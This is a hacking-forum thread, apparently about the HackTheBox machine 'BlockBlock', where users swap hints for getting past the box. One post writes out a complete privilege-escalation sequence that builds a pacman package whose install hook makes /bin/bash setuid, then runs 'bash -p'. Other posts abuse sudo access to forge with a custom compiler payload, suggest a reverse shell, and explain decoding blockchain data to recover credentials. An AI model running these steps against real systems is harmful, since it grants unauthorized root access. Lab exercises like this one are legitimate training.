BLOCKBLOCK - HTB
by osamy7593 - Saturday November 16, 2024 at 07:12 PM
#61
(Nov 19, 2024, 06:29 PM)ritualist Wrote:
(Nov 19, 2024, 06:26 PM)gfttjdb Wrote:
(Nov 19, 2024, 06:01 PM)ritualist Wrote: For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p


I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.
not working bro 
[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.

It's for paul -> root
See my previous post for getting from keira to paul.

stop helping them dude.. don't you see it, they can't do even a simple things... they're bunch of script kiddies.
Reply
#62
Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?
Reply
#63
(Nov 19, 2024, 08:59 AM)test888 Wrote:
(Nov 18, 2024, 03:58 PM)ritualist Wrote: To escalate to paul:

Init a new project
sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc
sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

Yes, as keira, and make it rx for everyone
Reply
#64
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?

Because it's not an usual Input like the one as the 2nd contract, but the opcodes for EVM. I also stucked here for quite some time and it turns out even you decode all the opcodes for the outcome, we need to make some guess on the password. This should indeed an insane level for getting user
Reply
#65
(Nov 20, 2024, 08:29 AM)Axura Wrote:
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?

Because it's not an usual Input like the one as the 2nd contract, but the opcodes for EVM. I also stucked here for quite some time and it turns out even you decode all the opcodes for the outcome, we need to make some guess on the password. This should indeed an insane level for getting user

Just decode the blob from hex in Cyberchef and you will find the username and password at the end of the output
Reply
#66
i think i have a new hatred for blockchain stuff after this box Confusedob:
Reply
#67
(Nov 20, 2024, 04:27 PM)iiNovaCore Wrote: i think i have a new hatred for blockchain stuff after this box  Confusedob:

This is so true Smile
Reply
#68
(Nov 20, 2024, 08:48 AM)a44857437 Wrote:
(Nov 20, 2024, 08:29 AM)Axura Wrote:
(Nov 20, 2024, 01:58 AM)grisun0 Wrote: Hi guys! I've been trying for days to decode the input I got from the first transaction in the first block to retrieve the user Keira from hash ? or input ?. I've tried various online tools, converting hex to decimal, binary, ASCII, UTF-8, and even using a Node.js app that's supposed to handle this, but I haven't managed to make it work ?, i've tried this https://lab.miguelmota.com/ethereum-inpu...r/example/ but nothing . Any tips on how to retrieve the user Keira using the eth_getBlockByNumber method from Ethereum JSON-RPC?

Because it's not an usual Input like the one as the 2nd contract, but the opcodes for EVM. I also stucked here for quite some time and it turns out even you decode all the opcodes for the outcome, we need to make some guess on the password. This should indeed an insane level for getting user

Just decode the blob from hex in Cyberchef and you will find the username and password at the end of the output

Thank you very much, you unblocked me, I was already very stuck.
Reply
#69
This box is a whole new level of "why isnt this working"
Reply
#70
when trying to interact i keep getting Error: 401 {"error":"Prox
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 66 1,776 3 hours ago
Last Post: vlka
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 370 92,502 9 hours ago
Last Post: lifolifo007
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,210 11 hours ago
Last Post: kkkato
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 20 2,525 Apr 29, 2026, 11:06 PM
Last Post: op334
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 3 414 Apr 29, 2026, 10:36 PM
Last Post: op334

Forum Jump:


 Users browsing this forum: 1 Guest(s)